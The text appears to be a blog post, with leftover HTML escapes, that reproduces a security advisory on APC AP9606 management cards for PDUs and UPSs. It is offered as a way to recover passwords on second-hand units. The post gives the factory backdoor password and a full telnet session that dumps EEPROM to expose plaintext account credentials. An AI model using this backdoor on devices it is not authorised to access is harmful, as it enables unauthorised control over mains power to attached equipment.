Ever bought one of those APC Masterswitch PDU’s from eBay, then tried to login to the admin interface with the usual default “apc” \/ “apc” but found that the password had been changed?<\/p>\n
Manuals:<\/p>\n
The usual password recovery procedures (well documented) are quite tedious, requiring emails and serial numbers. What a pain!<\/p>\n
Here’s how to hack the password:<\/strong> *** The Problem: Tested vulnerable: *** Description: The “backdoor” password is accepted via either the local serial port or *** To recreate (typical example): At the selection prompt, type 13 and press return. Type the byte address of Press return to get back to the Factory Menu and press ctrl-A to logout. You should use the other selections with extreme care. You may cause Example:<\/p>\n [root@always root]# telnet 192.168.1.1 User Name : foo Factory Menu 1AP9606 Selection> 13<\/p>\n Enter byte address in Hex(XXXX): 1d0<\/p>\n 01D0 FF 50 46 61 70 63 00 FF .PFapc.. nxt,b-bck,p-pch,other-exit<\/p>\n ***\u00a0 UPDATE: “padre-d” has created a password generator to recover passwords by leveraging this vulnerability:<\/p>\n
\n*** Background:
\nAPC (American Power Conversion) SmartSwitch and UPS (uninterruptible power
\nsupply) products have a Web and SNMP management card installed that permits
\nlocal serial console, TELNET, web and SNMP management, monitoring and
\nmains power control of attached devices.<\/p>\n
\nAPC SmartSlot Web\/SNMP management cards have a “backdoor” password that can
\nbe abused to extract plain text username\/password details for all accounts
\nand hence gain unauthorised full control of the device.<\/p>\n
\nSmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6
\nMasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0<\/p>\n
\nThe “backdoor” password is designed for use by the factory for initial
\nconfiguration of the card, e.g. MAC Address, Serial Number etc. However, it
\nis possible to dump the contents of EEPROM which amongst other things
\nstores the account usernames and passwords.<\/p>\n
\nTELNET. Use of the password on the web interface does not appear to be
\npossible.<\/p>\n
\nConnect a console to the serial port or TELNET to the card. At the username
\nprompt use any username. The password is all alphabetic characters and is
\ncase sensitive: TENmanUFactOryPOWER<\/p>\n
\nthe EEPROM location to view, e.g. 1d0 and press return. Look carefully for
\nthe username and password pairs. Different firmware revisions may have the
\naccount details at different EEPROM locations. The accounts in the example
\nbelow are the default accounts after their passwords have been changed.
\nUsername: apc Password: BBCCDDEEF
\nUsername: device Password: AAAABBBBB<\/p>\n
\nYou can now TELNET to the card again and use the account details you’ve
\njust recovered to log into and control the device.<\/p>\n
\nirrepairable damage and will most certainly invalidate any warranty.
\nThe EEPROM also contains other user-configurable options in either plain
\ntext or binary encoded form. They are not detailed in this advisory.<\/p>\n
\nTrying 192.168.1.1…
\nConnected to 192.168.1.1.
\nEscape character is ‘^]’.<\/p>\n
\nPassword : TENmanUFactOryPOWER<\/p>\n
\nto exit<\/p>\n
\n2WA0044004472
\n3G9
\n410\/25\/2000
\n500 C0 B7 A2 C8 2D
\n6v3.2.1
\n7A
\n8A
\n9192.168.1.1
\nA255.255.255.0
\nB192.168.1.254
\nC
\nD
\nE
\nF
\nG<\/p>\n
\n01D8 FF FF FF FF FF FF 42 42 ……BB
\n01E0 43 43 44 44 45 45 46 00 CCDDEEF.
\n01E8 FF 64 65 76 69 63 65 00 .device.
\n01F0 FF FF FF FF 41 41 41 41 ….AAAA
\n01F8 42 42 42 42 42 00 FF 61 BBBBB..a
\n0200 64 6D 69 6E 20 75 73 65 dmin use
\n0208 72 20 70 68 72 61 73 65 r phrase
\n0210 00 FF FF FF FF FF FF FF ……..
\n0218 FF FF FF FF FF FF FF FF ……..
\n0220 64 65 76 69 63 65 20 75 device u
\n0228 73 65 72 20 70 68 72 61 ser phra
\n0230 73 65 00 FF FF FF FF FF se……
\n0238 FF FF FF FF FF FF FF FF ……..
\n0240 FF 00 00 FF FF FF FF 21 …….!
\n0248 56 00 00 00 00 00 00 55 V……U<\/p>\n